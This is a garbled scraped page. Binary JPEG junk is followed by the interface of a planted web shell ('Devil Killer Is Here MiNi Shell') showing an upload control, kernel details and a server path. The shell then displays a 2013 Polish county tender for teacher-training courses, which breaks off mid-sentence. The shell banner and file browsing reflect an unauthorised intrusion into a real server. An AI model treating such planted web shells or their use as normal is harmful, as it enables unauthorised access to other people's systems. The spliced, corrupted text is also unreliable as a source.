JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131003/203533-N-2013.html

<p class="kh_header"><b>Krotoszyn: Realizacja ofert doskonalenia nauczycieli biorących udział w projekcie Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim.</b><br>
<b>Numer ogłoszenia: 203533 - 2013; data zamieszczenia: 03.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Krotoszyński reprezentowany przez Zarząd Powiatu Krotoszyńskiego , ul. 56 Pułku Piechoty Wlkp. 10, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 7254256, faks 062 7253423.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja ofert doskonalenia nauczycieli biorących udział w projekcie Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia rozwoju szkół i przedszkoli w powiecie krotoszyńskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego jszego zamówienia jest    realizacja ofert doskonalenia nauczycieli biorących  udział w projekcie Wdrożenie modelu doskonalenia nauczycieli i kompleksowego wsparcia  rozwoju szkół i przedszkoli w powiecie krotoszyńskim. Realizacja ofert doskonalenia polegać ma w szczególności na przeprowadzeniu wykładów,  warsztatów, konsultacji     grupowych, dla nauczycieli i dyrektorów szkół i przedszkoli w  ramach 20 tematu  spośród katalogu  24 ofert,   określonych przez ORE. Wykłady, warsztaty oraz konsultacje obejmować będą następującą tematykę: Zadanie 1Techniki uczenia się i metody motywujące do nauki Odbiorcy - nauczyciele szkoły podstawowej Wykłady: 6 godz. Jak motywować ucznia do nauki?  przyczyny barku motywacji, jak sobie z nimi radzić? Jak wspierać i motywować dziecko do nauki w środowisku domowym  pozyskanie wiedzy i umiejętności przydatnej do prowadzenia rozmów, spotkań oraz zajęć psychoedukacyjnych dla rodziców. Warsztaty: 15 godz. Techniki uczenia się. Co angażuje uczniów w pracę na lekcji? Jakich technik można używać, aby zaangażować uczniów do efektywnej pracy na lekcji? Jak zaplanować lekcję z wykorzystaniem w/w technik? Jak stworzyć w klasie atmosferę wzmacniającą poczucie wartości uczniów? Jak zachęcać uczniów do samodzielności i odpowiedzialności za własną naukę? Zastosowanie w klasie wybranych technik uczenia, które będą: sprzyjały tworzeniu atmosfery i warunków wzmacniających poczucie własnej wartości ucznia, stymulowały wzrost zaangażowania i samodzielności, zachęcały do współdziałania w grupie oraz świadomego reagowania na zmieniające się okoliczności, mobilizowały uczniów do przyjęcia na siebie odpowiedzialności za proces uczenia się. Motywowanie uczniów do pracy. Stosowanie metod aktywizujących. Indywidualizacja pracy ucznia zdolnego, z trudnościami szkolnymi oraz z niepełnosprawnością intelektualną  praktyczne zastosowanie. Dostosowanie wymagań do potrzeb i możliwości w/w uczniów. Motywowanie ich do nauki. Konsultacje grupowe: 6 godz. Zadanie 2Techniki uczenia się i metody motywujące  do nauki Odbiorcy  nauczyciele szkoły podstawowej Wykłady: 6 godz. Jak motywować ucznia nadpobudliwego ruchowo, z FAS oraz  agresywnego do nauki?  przyczyny barku motywacji, jak sobie z nimi radzić? Jak integrować dzieci ze specjalnymi potrzebami edukacyjnymi w klasie? Podnoszenie aktywności uczniów w życiu szkoły. Jak nauczyć dzieci przestrzegania norm społecznych w szkole?  Jak rozmawiać z rodzicami, żeby przenieść proces motywowania uczniów, przestrzegania norm społecznych do pracy w domu Warsztaty: 15 godz. Techniki uczenia się. Jak  zaangażować uczniów w pracę na lekcji?Poszerzenie warsztatu pracy nauczycieli w zakresie technik uczenia się oraz metod aktywizujących. Zwiększenie kompetencji nauczyciela i uczniów ( również u. z  zaburzonym, agresywnym zachowaniem oraz ze  SPE) w zakresie technik nauczania oraz metod aktywizujących. Jak stworzyć w klasie atmosferę wzmacniającą poczucie wartości uczniów? Techniki uczenia się. Zastosowanie w klasie wybranych technik: Jak zaplanować lekcję z wykorzystaniem technik angażujących uczniów? Co sprzyja tworzeniu atmosfery i warunków wzmacniających poczucie własnej wartości ucznia? Stymulowanie oraz  wzrost zaangażowania uczniów w życie szkoły mobilizowanie uczniów do przyjęcia na siebie odpowiedzialności za proces uczenia się. Motywowanie uczniów do pracy. Stosowanie metod aktywizujących. wypracowanie w zespołach nauczycielskich katalogu sposobów motywowania uczniów, nabycie przez nauczycieli umiejętności właściwego doboru czynników motywujących w zależności od ucznia, sytuacji, kontekst Sukcesywne wdrażanie do praktyki szkolnej nowych metod motywowania uczniów do pracy oraz technik uczenia się zwiększających odpowiedzialność  osobistą za rozwój .Indywidualizacja pracy z uczniem ze specjalnymi potrzebami edukacyjnymi, FAS oraz zachowaniem agresywnym, nadpobudliwością psychoruchową  praktyczne zastosowanie. Dostosowanie wymagań do potrzeb i możliwości danego ucznia. doskonalenie  umiejętności pracy zespołowej przez nauczycieli i uczniów. doskonalenie przez nauczycieli umiejętności stosowania aktywizujących metod pracy na lekcjach i zajęciach pozalekcyjnych Konsultacje grupowe: 6 godz. Zadanie 3Techniki uczenia się i metody motywujące do nauki Odbiorcy  nauczyciele szkoły podstawowej Wykłady: 6 godz. Mechanizmy uczenia się, funkcjonowanie mózgu jak przyswaja wiadomości, nabycie umiejętności wstępnej diagnozy (czy uczeń jest wzrokowcem, słuchowcem itp.)Etapy rozwoju dziecka  dostosowanie technik uczenia do wieku i możliwości rozwojowych ucznia. Warsztaty: 15 godz. Jak zmotywować dziecko do nauki (we współpracy z rodzicami)Metody i techniki uczenia się. Jak efektywnie przekazywać wiedzę uczniom. Konsultacje grupowe: 6 godz. Zadanie 4Techniki uczenia się i metody motywujące do nauki Odbiorcy  nauczyciele szkoły podstawowej Wykłady: 6 godz. Techniki uczenia się  przegląd technik. Metody motywujące ucznia do pracy, nauki  przegląd metod. Warsztaty: 15 godz. Trening twórczego myślenia. Techniki uczenia się w praktyce.Motywowanie uczniów do pracy, nauki w praktyce dla nauczycieli klas I III oraz IV VI.Opracowanie szkolnego katalogu sposobów motywowania uczniów do pracy, nauki dostosowanego do potrzeb i specyfiki szkoły. Jak nauczyciel może pomóc rodzicom motywować dziecko do nauki  wskazówki do przeprowadzenia spotkania z rodzicami poświęconego w/w tematyce (praktyczne redagowanie komunikatów, praca w małych grupach, odgrywanie scenek z rozmów z różnymi trudnymi rodzicami np. rodzicem opornym na zmianę, milczącym, roszczeniowym, bezkrytycznym wobec siebie i postępowania dziecka). Konsultacje grupowe: 6 godz.Zadanie 5Techniki uczenia się i metody motywujące do nauki Odbiorcy   nauczyciele gimnazjumWykłady: 6 godz. zdobycie wiedzy jak uczy się mózg, informacje na temat procesów poznawczych, czynników motywujących do nauki, zdobycie wiedzy na temat uczenia się (neurodydaktyka),uświadomienie uczniom potrzeby uczenia się.Warsztaty: 15 godz. jak wykorzystać wiedzę o inteligencji wielorakiej oraz stylach uczenia się podczas prowadzenia lekcji i zajęć pozalekcyjnych,nabycie umiejętności konstruowania scenariuszy lekcji (w tym lekcji wychowawczych) z zastosowaniem wybranych technik aktywizujących,nowoczesne techniki uczenia się  jak wykorzystać je podczas różnych lekcji,jak nauczyć uczniów uczyć się, jak spowodować by uczeń przyjął na siebie odpowiedzialność za proces uczenia się.jak motywować ucznia słabego i zdolnego,praktyczne sposoby i techniki motywowania podczas pracy z uczniem, jak wpłynąć na rodziców, by motywowali swoje dzieci do nauki.Konsultacje grupowe: 6 godz. Zadanie 6Rodzice są partnerami szkołyOdbiorcy  nauczyciele szkoły podstawowejWykłady: 6 godz. Jak rozmawiać z Rodzicem? Podniesienie kompetencji w zakresie komunikacji interpersonalnej. Poznanie różnych form integracji i komunikacji szkoły z rodzicami.Promocja szkoły  poznanie różnych form promowania szkoły (osiągnięć, sukcesów) wewnątrz szkoły oraz w środowisku lokalnym. Poznanie przez pracowników szkoły informacji na temat potrzeb środowiska w zakresie proponowanej oferty edukacyjnej. Co rodzica zachęca do szkoły? Co zrobić, aby szkoła była atrakcyjna dla ucznia i rodzica? Jak wzbogacić jej ofertę? Analiza aktualnej sytuacji szkoły.Warsztaty: 15 godz.Diagnoza potrzeb rodzica  poznanie narzędzi, metod. Jak pozyskać rodziców do współpracy. Motywowanie rodzica do kontaktu ze szkołą. Prowadzenie spotkań z rodzicami, spotkań integracyjnych (wykorzystanie wiedzy zaprezentowanej na wykładzie w praktyce).Jak wykorzystać zasoby szkoły do jej promocji? (wykorzystanie wiedzy zaprezentowanej na wykładzie w praktyce). Promowanie wartości edukacji. Opracowanie planu promowania edukacji we współpracy z rodzicami oraz lokalnymi instytucjami.Stworzenie oferty placówki lub jej wzbogacenie. Wypracowanie gotowych form promocji. Przygotowanie graficznych opracowań promocji placówki.Konsultacje grupowe: 6 godz.Zadanie 7Rodzice są partnerami szkoły Odbiorcy  nauczyciele szkoły podstawowejWykłady: 6 godz. komunikacja interpersonalna  proces komunikacji, rodzaje komunikacji, kanały komunikacji, konstruktywne informacje zwrotne, warunki dobrej rozmowy z rodzicem  aranżacja przestrzeni, komunikaty typu ty i typu ja. Jak rozmawiać z Rodzicem? Podniesienie kompetencji w zakresie komunikacji interpersonalnej. Poznanie różnych form integracji i komunikacji szkoły z rodzicami.Warsztaty: 15 godz.Diagnoza potrzeb rodzica  poznanie narzędzi, metod. Jak pozyskać rodziców do współpracy? Motywowanie rodzica do kontaktu ze szkołą. Prowadzenie spotkań z rodzicami, spotkań integracyjnych (wykorzystanie wiedzy wprowadzonej na wykładzie  w praktyce).Jak wykorzystać zasoby szkoły do jej promocji i zaangażowania rodziców w życie szkoły? Opracowanie planu promowania edukacji we współpracy z rodzicami oraz lokalnymi instytucjami.Jak zachęcić rodzica do współpracy ze szkołą?  udział rodziców w imprezach organizowanych przez szkołę, wysoka frekwencja rodziców  na zebraniach, wyrobienie w rodzicach nawyków korzystania z dziennika elektronicznego. Jak egzekwować od  uczniów frekwencję  na zajęciach i zachęcać rodziców do monitorowania obecności swoich dzieci na lekcjach?Konsultacje grupowe: 6 godz. Zadanie 8Rodzice są partnerami szkołyOdbiorcy  nauczyciele liceum ogólnokształcącegoWykłady: 6 godz. Komunikacja interpersonalna  proces komunikacji, rodzaje komunikacji, kanały komunikacji, konstruktywne informacje zwrotne, warunki dobrej rozmowy z rodzicem  aranżacja przestrzeni, komunikaty typu ty i typu ja, odzwierciedlanie, parafrazowanie, niespójność komunikatu werbalnego z niewerbalnym, itp. Diagnoza potrzeb rodziców:metody, narzędzia badawcze,jak przełamać opór rodziców przed kontaktem z nauczycielem? Warsztaty: 15 godz. Stres  radzenie sobie ze stresem i sytuacjami trudnymi w życiu nauczyciela np. rodzic agresywny, roszczeniowy, rodzic pod wpływem alkoholu na wywiadówce, rodzic z pretensjami, że dziecko zostało niesprawiedliwie potraktowane  np. zła ocena/nagana. Jak rozmawiać z trudnym rodzicem (rodzic broniący dziecka, niedopuszczający racji nauczyciela do głosu)  wykorzystanie wiedzy wprowadzonej na wykładzie  w praktyce. Jak stworzyć warunki dobrej rozmowy,  w czyjej obecności rozmawiać? Aspekt prawny  w jakich sytuacjach nauczyciel musi podjąć działanie wynikające z obowiązków usankcjonowanych prawem? Asertywność  jak być asertywnym w kontakcie z rodzicem?Rada Rodziców  jak nawiązać efektywne relacje z członkami RR? Konsultacje grupowe: 6 godz. Zadanie 9 Jak i po co prowadzić ewaluację wewnętrzną Odbiorcy nauczyciele przedszkolaWykłady: 6 godz. Nabycie i zweryfikowanie wiedzy na temat ewaluacji, form w jakich realizowana jest w edukacji  ewaluacja wewnętrzna i zewnętrzna oraz jej funkcji w procesie rozwoju szkoły. Cele i istota ewaluacji  po co jest? Założenia ewaluacji wewnętrznej i zewnętrznej. Analiza wymagań stawianych placówce. Obszary ewaluacji. Co oznaczają przyznawane placówce oceny?Procedura prowadzenia ewaluacji  opis kolejnych działań, planowanie działań ewaluacyjnychPoznanie przez nauczycieli metod, narzędzi i procedur przydatnych w przeprowadzeniu 	ewaluacji wewnętrznej.Warsztaty: 15 godz.Warunki udanej ewaluacji. Ćwiczenie umiejętności przeprowadzania ewaluacji. Jak przygotować się do ewaluacji zewnętrznej? Przełożenie wyników i wniosków z ewaluacji wewnętrznej na zadania.Opracowanie i wdrożenie działań służących rozwojowi i doskonaleniu jakości pracy przedszkola  innowacyjne metody pracy. Współpraca ze środowiskiem lokalnym. Współpraca z rodzicami(komunikacja, formy). Oferta przedszkola. Kształcenie kompetencji w zakresie form pracy zespołowej.Konsultacje grupowe: 6 godz. Zadanie 10Nauczyciel 45plus  Odbiorca  nauczyciele przedszkolaWykłady: 6 godz. Pozyskanie oraz wzbogacenie kompetencji w zakresie pracy z komputerem, programami użytkowymi, zastosowanie nowoczesnych technologii w procesie dydaktyczno wychowawczym. Wykorzystanie zasobów portali internetowych dla nauczycieli. Rozwój osobisty nauczyciela w kontekście siły i odporności psychicznej, wypalenia zawodowego oraz regeneracji zasobów psychofizycznych.Warsztaty: 15 godz.Poruszanie się w systemie Windows. Operacje na plikach i folderach. Edytor tekstu WORD. Tabele  tworzenie, usuwanie, edytowanie. Internet  wyszukiwanie informacji. Podstawy Excela.Umiejętność pracy w sieci Internet w zakresie posługiwania się pocztą elektroniczną. Przeglądanie i wyszukiwanie informacji na stronach WWW  projekty, konkursy, itp. Tworzenie pomocy do pracy dydaktycznej.Uaktualnianie strony internetowej placówki.Jak wykorzystać komputer w pracy z dzieckiem w wieku przedszkolnym? Trening wzmocnienia sił psychicznych i odporności na stres. Profilaktyka wypalenia zawodowego oraz radzenia sobie z jego objawami. Komunikacja interpersonalna. Asertywność.Konsultacje grupowe: 6 godz. Zadanie 11 Nauczyciel 45+ Odbiorcy  nauczyciele liceum ogólnokształcącegoWykłady: 6 godz. wypalenie zawodowe: symptomy, sposoby radzenia sobie zagadnienia prawne dotyczące zdrowia nauczycieli  uprawnieniaskuteczne sposoby komunikacjiWarsztaty: 15 godz. sposoby radzenia sobie ze stresem, ze zmianą, nadążanie za nowościami skuteczna komunikacja interpersonalna, poprawa relacji w zespole, współpraca, umiejętność budowania komunikatów, budowanie autorytetu nauczyciela zarządzanie czasem Konsultacje grupowe: 6 godz. Zadanie 12Efektywna organizacja pracy zespołów nauczycielskich  Odbiorcy  nauczyciele liceum ogólnokształcącegoWykłady: 6 godz. Komunikacja interpersonalna  proces komunikacji, rodzaje komunikacji, kanały komunikacji, konstruktywne informacje zwrotne, warunki dobrej rozmowyNabywanie wiedzy i umiejętności z zakresu  tworzenia zespołu, określanie ról jego członków, monitorowanie pracy zespołu, podział zadań, wypracowanie  zasad powoływania zespołów zadaniowych.Warsztaty: 15 godz.Nabieranie i doskonalenie kompetencji  interpersonalnych:  umiejętności komunikacyjne, asertywność, udzielanie i przyjmowanie informacji zwrotnej,formułowanie komunikatu typu ja, umiejętność aktywnego słuchania,poznanie przez uczestników swoich silnych i słabych stron w zakresie umiejętności kontaktowania się z innymi. Kształtowanie pozytywnych i bezpiecznych relacji wśród nauczycieli: praca modelem analizy transakcyjnej (ja ok  ty ok), integracja członków zespołu, twórcze rozwiązywanie problemów  konflikt jako motor rozwoju rozwiązywanie konfliktów personalnych.Organizacja współpracy nauczycieli radzenie sobie ze stresem oraz konstruktywne  rozwiązywanie konfliktów,zarządzanie stresem,prezentacje i wystąpienia publiczne (w ramach zarządzania stresem) opracowanie i realizacja  programu integrującego nauczycieli.Konsultacje grupowe: 6 godz. Zadanie 13Ocenianie kształtujące Odbiorcy  nauczyciele gimnazjumWykłady: 6 godz. Ocenianie kształtujące SUS  czym jest, na czym polega?Przygotowanie szkoły do prowadzenia elementów ok.Warsztaty: 15 godz.Wprowadzenie do szkoły jednolitego systemu oceniania zawierającego elementy ok  opracowanie i wdrożenie jednolitego  modelu pozwalającego na trwałe stosowanie metod ok. na wszystkich przedmiotach i zajęciach oraz jako ocenę zachowania. Motywowanie uczniów, również uczniów ze specjalnymi potrzebami edukacyjnymi do nauki poprzez  wprowadzanie skutecznych metod uczenia się i ich stosowanie.Poszerzenie kompetencji nauczycieli w obszarze stosowania informacji zwrotnej w ocenianiu oraz komunikacji z rodzicami uczniów. Zaznajomienie nla ze sposobami formułowania IŻ adresowanej do ucznia w taki sposób, by motywowała ona ucznia do pracy i przyniosła obustronne korzyści. Prowokowanie ucznia do samooceny i autorefleksji jako sposobu na zwiększenie świadomości dot. własnych osiągnięć edukacyjnych.Konsultacje: 6 godz. Zadanie  14 Budowa koncepcji pracy przedszkola. Odbiorcy  nauczyciele przedszkolaWykłady: 6 godz. Metody i formy pracy z dziećmi w wieku przedszkolnym. zaprezentowanie nowościJak efektywnie rozwijać współpracę z rodzicami i środowiskiem lokalnym (położenie nacisku na środowisko).Warsztaty: 15 godz.Metody i formy pracy w edukacji umysłowejlogiczne myślenie,rozwijanie mowy,praca metodą projektuWzorcowe ułożenie koncepcji pracy przedszkola.Model absolwenta  jak osiągnąć założony, wzorcowy rezultat.Konsultacje grupowe: 6 godz. Zadanie 15Jak pomóc uczniowi osiągnąć sukces edukacyjny Odbiorcy  nauczyciele szkoły podstawowejWykłady: 6 godz. Jak motywować dziecko do nauki (we współpracy z rodzicami).Indywidualizacja procesu nauczania, dostosowanie wymagań oraz metod i technik uczenia do psychofizycznych możliwości uczniaWarsztaty: 15 godz.Jak efektywnie przekazywać wiedzęMetody i techniki uczenia sięMetoda projektu Konsultacje grupowe: 6 godz. Zadanie  16Jak pomóc uczniowi osiągnąć sukces edukacyjny Odbiorcy  nauczyciele szkoły podstawowejWykłady: 6 godz. Czynniki motywujące ucznia w procesie edukacyjnymDoskonalenie kompetencji nauczycieli w zakresie diagnozy potrzeb i możliwości edukacyjnych uczniów, indywidualizowanie strategii uczenia się, stosowanie skutecznych rozwiązań metodycznych.Warsztaty: 15 godz. Jak zmotywować dziecko do nauki Metody i techniki uczenia sięJak efektywnie przekazywać wiedzęKonsultacje grupowe: 6 godz. Zadanie 17Jak pomóc uczniowi osiągnąć sukces edukacyjny Odbiorcy - nauczyciele gimnazjumWykłady: 6 godz. jak wykorzystać wiedzę z analizy wyników egzaminów zewnętrznych do poprawy jakości kształcenia,jak zmobilizować rodziców, by kontrolowali, wzmacniali i motywowali swoje dzieci do nauki, by osiągali efekty kształcenia zgodne z ich możliwościami.wiedza na temat procesów uczenia się i osiągania sukcesów edukacyjnych przez uczniów.Warsztaty: 15 godz. jak praktycznie realizować indywidualizację nauczania w dużej i zróżnicowanej grupie (konkretne rozwiązania),jak zachęcić uczniów do nauki, udziału w zajęciach dydaktyczno  wyrównawczych,jak uświadomić uczniom ważność uczenia się,innowacyjne metody pracy z uczniami z uwzględnieniem zespołów przedmiotowych (humanistyczne, przyrodniczo  matematyczne),nabycie umiejętności budowania wspólnej strategii pracy nauczyciela i rodziców na rzecz wspierania rozwoju ucznia.Konsultacje grupowe: 6 godz. Zadanie 18 Oferta edukacyjna drogą do właściwej realizacji podstawy programowejOdbiorcy nauczyciele przedszkolaWykłady: 6 godz. Innowacje pedagogiczne jako ciekawy sposób na realizację podstawy programowej. Aspekty prawne tworzenia innowacji pedagogicznych zgodnych z podstawą programową i 	procedura uzyskania wpisu do rejestru i akceptacji KO.Umiejętność poprawnego tworzenia innowacji pedagogicznych zgodnych z podstawą programową  jej części składowe, pułapki i najczęstsze błędy. Etapy, procedury wdrażania innowacji pedagogicznych w przedszkolu z oddziałami integracyjnymi. Warsztaty: 15 godz. Jak wybrać obszar do wprowadzenia innowacji pedagogicznej zgodnej z podstawą programową?  metody i narzędzia do diagnozy. Przegląd przykładowych innowacji pedagogicznych realizowanych w przedszkolach, w tym również w przedszkolach z oddziałami integracyjnymi. Tworzenie własnej innowacji pedagogicznej zgodnej z podstawą programową i zdiagnozowanymi potrzebami przedszkola z oddziałami integracyjnymi. Jak poprawnie przeprowadzić ewaluację opracowanej innowacji pedagogicznej w przedszkolu z oddziałami integracyjnymi? Konsultacje grupowe: 6 godz. Zadanie 19Postawy uczniowskie. Jak je kształtować? Odbiorcy  nauczyciele szkoły podstawowejWykłady: 6 godz. Postawy uczniowskie. Jak je kształtować?komunikacja interpersonalna  proces komunikacji, rodzaje komunikacji, kanały komunikacji, konstruktywne informacje zwrotne, warunki dobrej rozmowy z rodzicem  aranżacja przestrzeni, komunikaty typu ty i typu ja, odzwierciedlanie, parafrazowanie, niespójność komunikatu werbalnego z niewerbalnym, itp. Nauczyciel wobec trudnych zachowań ucznia - procedury przykładowego postępowania i aspekt prawny skutecznej interwencji. Warsztaty: 15 godz. Umiejętność komunikacji interpersonalnej  wykorzystanie wiedzy teoretycznej w praktyce. Nauczyciel wobec trudnych zachowań ucznia  np. uczeń agresywny słownie, fizycznie, niewykonujący poleceń nauczyciela, łamiący normy szkolne, wychodzący z klasy bez zgodny nauczyciela, nie notujący na lekcji  wypracowanie procedur postępowania wobec ucznia i rodzica dostosowanych do potrzeb i specyfiki szkoły. Jak współpracować z rodzicami uczniów sprawiających trudności wychowawcze w kontekście współodpowiedzialności za kształtowanie ich postaw?  ćwiczenia praktyczne rozmowy z rodzicami, redagowanie prawidłowych i efektywnych komunikatów, reagowanie w sytuacjach, gdy rodzic nie dopuszcza do wiadomości, że dziecko może łamać zasady szkole  uporczywie broni dziecka.  Konsultacje grupowe: 6 godz.Zadanie 20Szkoła promuje wartość edukacjiOdbiorcy  nauczyciele liceum ogólnokształcącegoWykłady: 6 godz. zasady promocji edukacji,przykłady dobrych praktyk,budowanie pozytywnego wizerunku placówki oświatowej.Warsztaty: 15 godz. jak zachęcić Radę Rodziców do aktywnego działania,tworzenie inicjatyw, działań w środowisku lokalnym w celu poprawy wizerunku szkoły,jak angażować szkolne organizacje do promowania szkoły,co zrobić , żeby szkoła była postrzegana jako atrakcyjna, ciekawa, inna od wszystkich?jak budować pozytywny wizerunek szkoły,jak promować szkołę  praktyczne rozwiązania,poszerzenie kompetencji nauczycieli w zakresie stosowania metod aktywizujących, innowacyjnych  (w zakresie różnych przedmiotów),budowanie dobrej atmosfery w szkole (komunikacja uczeń  nauczyciel i nauczyciel  nauczyciel).Konsultacje grupowe: 6 godz. warunki  realizacji  przedmiotu  zamówienia:Miejsce realizacji: szkoły i przedszkola w powiecie krotoszyńskim  20 Odbiorca: nauczyciele (rady pedagogiczne)Liczebność grup: 10 45 osób. Zamawiający zobowiązuje się  do poinformowania Wykonawcy o ostatecznej liczbie uczestników, każdego ze szkoleń, najpóźniej na trzy dni prze  ich planowym rozpoczęciem.Formy doskonalenia: wykłady (6 godz.), warsztaty (15 godz.), konsultacje grupowe (6 godz.)Terminy realizacji poszczególnych form doskonalenia:wykłady  październik /listopad 2013 r. (6 godz.) warsztaty  październik/listopad 2013 r. (5 godz.)  I tura, styczeń/luty 2014 r. (10 godz.)  II turakonsultacje grupowe - marzec /kwiecień 2014 r. (6 godz.)   w ramach każdej z ofert doskonaleniaEtapy realizacji zamówienia: Przygotowanie do przeprowadzenia szkoleń:Przygotowanie szczegółowych scenariuszy (dot. wykładów i warsztatów) leży po stronie Wykonawcy.Scenariusze mają zostać opracowane  zgodnie z opisem każdej z 20 ofert doskonalenia ujętych w zamówieniu  wziąwszy pod uwagę oczekiwania odbiorców, którymi są nauczyciele odpowiednio przedszkoli, szkół podstawowych, gimnazjów, szkół ponadgimnazjalnych. Scenariusze powinny zawierać:temat, cel szczegółowy, cele operacyjne, metody pracy, formy pracy, środki 